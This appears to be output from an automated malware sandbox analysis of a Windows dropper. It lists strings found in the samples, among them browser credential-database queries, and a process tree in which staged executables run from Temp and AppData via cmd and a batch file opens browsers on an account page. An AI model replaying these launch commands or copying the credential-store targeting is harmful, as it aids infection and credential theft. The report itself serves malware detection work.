Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.11.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.11.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: bfb8bb0dc7.exe, bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: bfb8bb0dc7.exe, 0000000B.00000003.2856849550.0000000022E09000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000003.2885748610.0000000022DFC000.00000004.00000020.00020000.00000000.sdmp, IECBAFCAAKJDHJKFIEBG.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.11.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 6SoKuOqyNh.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File read: C:\Users\user\Desktop\6SoKuOqyNh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6SoKuOqyNh.exe "C:\Users\user\Desktop\6SoKuOqyNh.exe"
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2104,i,2763615900740779582,2928717422686434053,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2256 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f267dd4-7cc3-4504-b66d-b554eae41855} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 1892526ad10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5280 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3540 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -parentBuildID 20230927232528 -prefsHandle 3208 -prefMapHandle 3204 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2957b26f-774e-48be-a5e4-6995945e05fa} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 189373ea410 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7340 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"
Source: unknown	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,9310775074731790964,8760316038364529683,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6720 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7056 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2104,i,2763615900740779582,2928717422686434053,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2256 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f267dd4-7cc3-4504-b66d-b554eae41855} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 1892526ad10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -parentBuildID 20230927232528 -prefsHandle 3208 -prefMapHandle 3204 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2957b26f-774e-48be-a5e4-6995945e05fa} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 189373ea410 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5280 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3540 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7340 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6720 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
